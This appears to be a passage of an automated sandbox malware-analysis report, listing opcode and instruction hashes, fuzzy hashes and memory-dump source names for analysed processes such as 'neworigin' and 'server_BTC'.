                                                                                                                                • Opcode ID: 9124b18e75c88b4200b676d84be979a7850abfbead414ce9b7626b09f868c1ab
                                                                                                                                • Instruction ID: 8f1325d34e90a57bdb6dba0d08f9d4e4a6ac30bd343a4381d4041b2e010ccb4c
                                                                                                                                • Opcode Fuzzy Hash: 9124b18e75c88b4200b676d84be979a7850abfbead414ce9b7626b09f868c1ab
                                                                                                                                • Instruction Fuzzy Hash: 0151A370B103198BEF645B7CD8947AF265BDBC9B60F60443EE40ADB394CA6DCC454792
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 10d8025daf69f9d9daef3908b039b5a81879d0062d35393cc7734a4d88f98a7c
                                                                                                                                • Instruction ID: 197f7be9aee3360d5ce8e046645a5f5768bb4d08639022e3474189e82359a5a2
                                                                                                                                • Opcode Fuzzy Hash: 10d8025daf69f9d9daef3908b039b5a81879d0062d35393cc7734a4d88f98a7c
                                                                                                                                • Instruction Fuzzy Hash: 67518270B1021A8BEF645BB8D9947AF225BDBC9B60F60443EE40BD7394CE6DCC454792
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c8e0d31f0b7153cc890805a90e151e84203cbf9365d9f62c337dc7969bb457d0
                                                                                                                                • Instruction ID: 80a10193bc0d2e177fcab991b0e3ec2605f3cb05db72510afe58ae3f06c59613
                                                                                                                                • Opcode Fuzzy Hash: c8e0d31f0b7153cc890805a90e151e84203cbf9365d9f62c337dc7969bb457d0
                                                                                                                                • Instruction Fuzzy Hash: C2517131B1110A9FDB95DF78D860BAE77F6EB88350F10847AD409EB354DE39AC028B94
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 05d2c200a1dc9cd8c99082b22e595266802493a2e35aa65e8fd10dcd4c57fa98
                                                                                                                                • Instruction ID: 0fe9cbe6da1f1dc1780b6d971b4310cae6b94da00e6b04acc5cc6ffdc84df5d5
                                                                                                                                • Opcode Fuzzy Hash: 05d2c200a1dc9cd8c99082b22e595266802493a2e35aa65e8fd10dcd4c57fa98
                                                                                                                                • Instruction Fuzzy Hash: D4518230F002199FDB549FA9C814BAEBAF6FFC8750F208429E505EB394DE759C058B95
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 262f59bbe161b105cae180d9b4f0378d444e58463de9dcad6bfad8ca626b58cf
                                                                                                                                • Instruction ID: b55d2a6371a5be2fd332b8939686320810797102901482aa302b4c430921274e
                                                                                                                                • Opcode Fuzzy Hash: 262f59bbe161b105cae180d9b4f0378d444e58463de9dcad6bfad8ca626b58cf
                                                                                                                                • Instruction Fuzzy Hash: 0F417071E0060A8FDF60CF99E880ABFF7B2EB95220F10492AD156D3650D730E8658B91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2d28724af75d05a70857a6073d9c3b6e0ae8484dfb467e90bce3c18b2df0d794
                                                                                                                                • Instruction ID: c769b6394eeee524a90284c00d037fc0f70ba6089ea2dc952927bfab2e3fe267
                                                                                                                                • Opcode Fuzzy Hash: 2d28724af75d05a70857a6073d9c3b6e0ae8484dfb467e90bce3c18b2df0d794
                                                                                                                                • Instruction Fuzzy Hash: F1411172A0436A9FEB159B6488507EEBBFAFFC9760F24452EC0459B280DB709805C7E5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a25d1a127f027df29ce6ae164709e09c957eb2be0f67c6d48d73b8543a93de19
                                                                                                                                • Instruction ID: 63a0713c8298a12462a1be0b073fe5500b0f93c506beb975b586ba91854b2164
                                                                                                                                • Opcode Fuzzy Hash: a25d1a127f027df29ce6ae164709e09c957eb2be0f67c6d48d73b8543a93de19
                                                                                                                                • Instruction Fuzzy Hash: 4D41AE70E0030A9FDB659F65C98069EBBB6FF85710F20452DE402EB240DBB5D946CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9be2773e14c4a7c62889f1657f5aad72b1e0e3899b2ae037924084201bef5b46
                                                                                                                                • Instruction ID: dcc232120a1759cb0830f080da055a249a173c5963d7dbf137fa1dd76f8f9ea4
                                                                                                                                • Opcode Fuzzy Hash: 9be2773e14c4a7c62889f1657f5aad72b1e0e3899b2ae037924084201bef5b46
                                                                                                                                • Instruction Fuzzy Hash: CB319030B0020A9FDB69AB74D45466E76A6AFC9720F20852CD402DB391DF39DD01C795
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cc903ee439abf4d19371901215422c2bb20a87f2f1de8adbc3f62cccf9a3268f
                                                                                                                                • Instruction ID: 838b2680557260b382f70ea173c5e76bebf3c6a6d21cb0f447fcfd84a8e79649
                                                                                                                                • Opcode Fuzzy Hash: cc903ee439abf4d19371901215422c2bb20a87f2f1de8adbc3f62cccf9a3268f
                                                                                                                                • Instruction Fuzzy Hash: ED318F30E1021A9BCB58DF69D89469EB7F2FF89350F108519E906E7340DB71AE42CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5abd33af85c07f6010e062f00899306cbf669d9d7f14511ee229035a7d9502e5
                                                                                                                                • Instruction ID: 791e6b226358b2cac811d3f5ce177e63da42b6ca287f3252712f63376120c07e
                                                                                                                                • Opcode Fuzzy Hash: 5abd33af85c07f6010e062f00899306cbf669d9d7f14511ee229035a7d9502e5
                                                                                                                                • Instruction Fuzzy Hash: EB318C30E1061A9BCB59CFA9D89469EB7B2FF89350F10852DE906E7340DB71AE42CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e85dcce8d0086617cdec15c2d4d864db60e4d49ac89dc0da8a24d7569b3cbc97
                                                                                                                                • Instruction ID: 9452368937b369cb07c1fa1e7df0461ce3ae389f152500d69b69bbb4fa809864
                                                                                                                                • Opcode Fuzzy Hash: e85dcce8d0086617cdec15c2d4d864db60e4d49ac89dc0da8a24d7569b3cbc97
                                                                                                                                • Instruction Fuzzy Hash: 03218D75E0121A9FDB50DF78D880AEEBBF5EB88310F118029E901E7350E739DC418B94
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 648aaf9d12174f282610afe026e23bbe2da09bd057b4ccb36e597301d693a4e3
                                                                                                                                • Instruction ID: 4991a9e608d72a6dc28366a82d969667ced4a7768151c6f9beff03de9ae38576
                                                                                                                                • Opcode Fuzzy Hash: 648aaf9d12174f282610afe026e23bbe2da09bd057b4ccb36e597301d693a4e3
                                                                                                                                • Instruction Fuzzy Hash: 51216975E0061A9FDB50DFB9D980AEEB7F5EB48320F108029E905E7390E739DD418B94
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1658430846.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_136d000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a2d246722d2bb3643e83db6b56789a9cc79d17141ff6a72d42e86de712a66009
                                                                                                                                • Instruction ID: e1f4d0c61beff80b88f393a2c6a2b9fa7406ad273be23432005af21577645a47
                                                                                                                                • Opcode Fuzzy Hash: a2d246722d2bb3643e83db6b56789a9cc79d17141ff6a72d42e86de712a66009
                                                                                                                                • Instruction Fuzzy Hash: 032104B1604304EFDB15DF64C9C4B26BBA9FB84318F20C56DE8894F64AC776D447CA62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ba15ad5a726ef20466b3e0b61183a94087a558538581ef98bb6845cff67fad58
                                                                                                                                • Instruction ID: dc5a244d35bdd52840fc548397e81ce04f05e7550f28f3e5bb17a5d61a332435
                                                                                                                                • Opcode Fuzzy Hash: ba15ad5a726ef20466b3e0b61183a94087a558538581ef98bb6845cff67fad58
                                                                                                                                • Instruction Fuzzy Hash: 9F01F531B042151FCB6696BDD86071FB7EADBC6720F24843EE40ACB351D969DC068391
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 138ce10f160ad6ac10ad4b3fae433be7ac9b65ffda9128d25ee53288b51d7807
                                                                                                                                • Instruction ID: cc15f4070c2181a83f307cdd94ce4ed056734c0a70c64dc1b167559518844649
                                                                                                                                • Opcode Fuzzy Hash: 138ce10f160ad6ac10ad4b3fae433be7ac9b65ffda9128d25ee53288b51d7807
                                                                                                                                • Instruction Fuzzy Hash: 4C11A136B0012A9BDF95AA79C8146AE73EAEBC8350F058539D506EB344DE29DC028BD1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8870a4e947b68478dffc06792d4dd0a4b4ac63f72a088458753abd1774dcb85a
                                                                                                                                • Instruction ID: 4674115d4204568ca943a4b9f40a30c5f19d76c938209c2bacf1bc32a5c31dde
                                                                                                                                • Opcode Fuzzy Hash: 8870a4e947b68478dffc06792d4dd0a4b4ac63f72a088458753abd1774dcb85a
                                                                                                                                • Instruction Fuzzy Hash: 5B01F130B0021A1FCB668B7DE850B2BB7EADBC66A4F14887EF00AC7340DA25CC064391
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8490185a61d94d274987ff508411cf940c8b06a20f248f265e82dc8480ddd012
                                                                                                                                • Instruction ID: 0507103199b7cba88da3a997116f896925dd8e651d20816f2a5a711489f1d7d5
                                                                                                                                • Opcode Fuzzy Hash: 8490185a61d94d274987ff508411cf940c8b06a20f248f265e82dc8480ddd012
                                                                                                                                • Instruction Fuzzy Hash: 3721C0B5D01219AFCB10CF9AD884ACEFBF4FF48320F10852AE918A7240D775A954CFA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1658430846.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_136d000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
                                                                                                                                • Instruction ID: f37772bfea3c8b9c4c6f6281a307bb13ece048aaaa5ed3c4dde508568420564f
                                                                                                                                • Opcode Fuzzy Hash: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
                                                                                                                                • Instruction Fuzzy Hash: BD11DD75604284CFCB12CF54C9C4B15BFA2FB84318F24C6A9E8894B656C33AD44ACF62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3e45962212dda1fa7b00a31bbc3dfeff61bac6a2a3f002b9efc8c619068a8b47
                                                                                                                                • Instruction ID: c7ea68ee5fa141993f34cb97284bb733a4cedceccfd07955c9c3921f336b7e3c
                                                                                                                                • Opcode Fuzzy Hash: 3e45962212dda1fa7b00a31bbc3dfeff61bac6a2a3f002b9efc8c619068a8b47
                                                                                                                                • Instruction Fuzzy Hash: E501B132B1012A5BDF959A7998146AE76AADBC8210F14853ED406E7240EE799C028BD5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8e247676761e05b44a9b543e55af12ef7e180199b4a9f4b248c1bc00050762b7
                                                                                                                                • Instruction ID: 30a4a9394b1c912f63cc3afeb32ac422a34fcbc71f8f1cc66e9175211241fe10
                                                                                                                                • Opcode Fuzzy Hash: 8e247676761e05b44a9b543e55af12ef7e180199b4a9f4b248c1bc00050762b7
                                                                                                                                • Instruction Fuzzy Hash: 6C01B132B042094FDBA2AA7CE85476A77E5EB89720F14883AE00ECB350DE19DC028795
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1553d4160ef220af3a10366d68e9be9ec1f7d5acb5556b32c8cf2ce48cb152d9
                                                                                                                                • Instruction ID: 2e031ebcbc785d9eb9646ae9b1844f9d364405c0ec84a47331073b4ff18a0a4e
                                                                                                                                • Opcode Fuzzy Hash: 1553d4160ef220af3a10366d68e9be9ec1f7d5acb5556b32c8cf2ce48cb152d9
                                                                                                                                • Instruction Fuzzy Hash: 6E11B0B5D01259AFCB10CF9AD884ADEFBF4FB48324F10812AE918A7340C375A954CFA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dc68d84c947788bb747a710619ea53a39fe3b288a291a05debf00de89143540a
                                                                                                                                • Instruction ID: 8b18a0b61a07a40fb9684f4a9741a5eaf664833b412ceb4ce34ae9239948719b
                                                                                                                                • Opcode Fuzzy Hash: dc68d84c947788bb747a710619ea53a39fe3b288a291a05debf00de89143540a
                                                                                                                                • Instruction Fuzzy Hash: F4016D31B101291BDBA596ADD860B2FB2EADBC9A60F24843EE50EC7354DE65DC024391
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a4d483f0b64b908c205f5ff5a52aa10abe78dab99a3f6053f0ed7162981753c1
                                                                                                                                • Instruction ID: c358aa2ee9aa1ba7d96f49274a22a5e2bad361777e816e60b7499a2c85e0714d
                                                                                                                                • Opcode Fuzzy Hash: a4d483f0b64b908c205f5ff5a52aa10abe78dab99a3f6053f0ed7162981753c1
                                                                                                                                • Instruction Fuzzy Hash: 6301AF71B0012A5BDB659ABDE850B6FB3DADBC9A64F14883DF10AC7340DE69DC024391
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0a4af0e57d7091b661bd444c98698ef991b56b9af02645cebb2ad65b931260fb
                                                                                                                                • Instruction ID: e752c4ec6124dc7052a42778644f69a0e316dbfaa1c35142d6a570896195a075
                                                                                                                                • Opcode Fuzzy Hash: 0a4af0e57d7091b661bd444c98698ef991b56b9af02645cebb2ad65b931260fb
                                                                                                                                • Instruction Fuzzy Hash: AB018132B101195BDBA1EE7CE854B6A73E9EB89B60F14883DE10EC7350DE29DC024395
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e35eb0df4d02e13fcec27fece2fba3b6fca76024c9251c592f1e00e92740307e
                                                                                                                                • Instruction ID: e4c6bb371b5e0b5530bac6d7683c63e66002554d7fa40d0d6e8f9a0201e90ccb
                                                                                                                                • Opcode Fuzzy Hash: e35eb0df4d02e13fcec27fece2fba3b6fca76024c9251c592f1e00e92740307e
                                                                                                                                • Instruction Fuzzy Hash: 7B019E71D0436D8BEB14DBA4C8507EEBAF6BF89620F14051DD441B7280DBB45944C7A5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 17066df86b1807f8d358ff2da0b0974862189dd937cee47b1da834ac157185fc
                                                                                                                                • Instruction ID: 2803581c8a6a7237878d1f55fb302f0dc0e7587add330f01c4b638dac1c34536
                                                                                                                                • Opcode Fuzzy Hash: 17066df86b1807f8d358ff2da0b0974862189dd937cee47b1da834ac157185fc
                                                                                                                                • Instruction Fuzzy Hash: 90F0D131A0830A9FDFA49F98E980AA87BAEEB88221F1040B9C905D7110DB39D905D790
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b13695f162b4b4c937e10194a0c6bee4eb7826ba4bc5899cadaa69c1eee65481
                                                                                                                                • Instruction ID: f996efe2edcda7063c9ae16bff7295d0cce47416382ac1ce125eecdd1fde5dd3
                                                                                                                                • Opcode Fuzzy Hash: b13695f162b4b4c937e10194a0c6bee4eb7826ba4bc5899cadaa69c1eee65481
                                                                                                                                • Instruction Fuzzy Hash: 6CF096353083904FC745A73898646993FBA9F8A600F0541EBD099CF7A7CD59DC068796
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ac80255d015a10681570de2f372114d8ca1047f47454a2445914bf3bdb8af8ef
                                                                                                                                • Instruction ID: e3d2a23115156fd92c667ea40403c8bd7cb78f00bc7006451725fbe4123b4269
                                                                                                                                • Opcode Fuzzy Hash: ac80255d015a10681570de2f372114d8ca1047f47454a2445914bf3bdb8af8ef
                                                                                                                                • Instruction Fuzzy Hash: 89F0A732E2122897DF549A65DC40ADBB73AE784264F004439EA15F7340DA75AC00C7D0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c52366154d4257ace21f00c2c67f4d0765caf080cf0084bd7082cda3cb1c98e7
                                                                                                                                • Instruction ID: c04d3e75f74880c842277d77c1f3a40b0b841acb7d2c6c3bdb6e1b96a269c105
                                                                                                                                • Opcode Fuzzy Hash: c52366154d4257ace21f00c2c67f4d0765caf080cf0084bd7082cda3cb1c98e7
                                                                                                                                • Instruction Fuzzy Hash: 56E06D303002204BC788AB68C864B6E37AAAFC8A00F0080A9A149CF3A5CEA1EC0147C4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e58d0f3f4468eea2872f48493660bf907d0d0252bed7f27dfc7acd0ae60f3902
                                                                                                                                • Instruction ID: 44264f2672943bf711706098273d70dc2431d4928d76fae489112917ce394d28
                                                                                                                                • Opcode Fuzzy Hash: e58d0f3f4468eea2872f48493660bf907d0d0252bed7f27dfc7acd0ae60f3902
                                                                                                                                • Instruction Fuzzy Hash: 71E09271E2528DAFDFA0CFB0C90835A7BB9DB46224F604DEDD404CB146E176DA028791
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7986ba7769598bb94c0e4830187ae36b2a7a989c77fd6be1b7239000048da61c
                                                                                                                                • Instruction ID: 800e764860352d7cedd68e7f37299dd54bc56cf7f92052c55d7b9cdcbd59800b
                                                                                                                                • Opcode Fuzzy Hash: 7986ba7769598bb94c0e4830187ae36b2a7a989c77fd6be1b7239000048da61c
                                                                                                                                • Instruction Fuzzy Hash: DC61CF34D01219CBDB15EFA4D994ADDBBB2FF89300F608169D405BB2A4DB356D46CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e7878faf0683a05addb99c42482ca689c4138ba0e64179bf02cc7ab6e2971501
                                                                                                                                • Instruction ID: 19d37343cbbac659e5de8c92b78a0fa6bdb130a7a6750dbb97676d0113f2019d
                                                                                                                                • Opcode Fuzzy Hash: e7878faf0683a05addb99c42482ca689c4138ba0e64179bf02cc7ab6e2971501
                                                                                                                                • Instruction Fuzzy Hash: 6161B174A00248CFCB44DFA9D594A9DBBF2FF89710F109069E80AAB365DB35AC46CF14
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
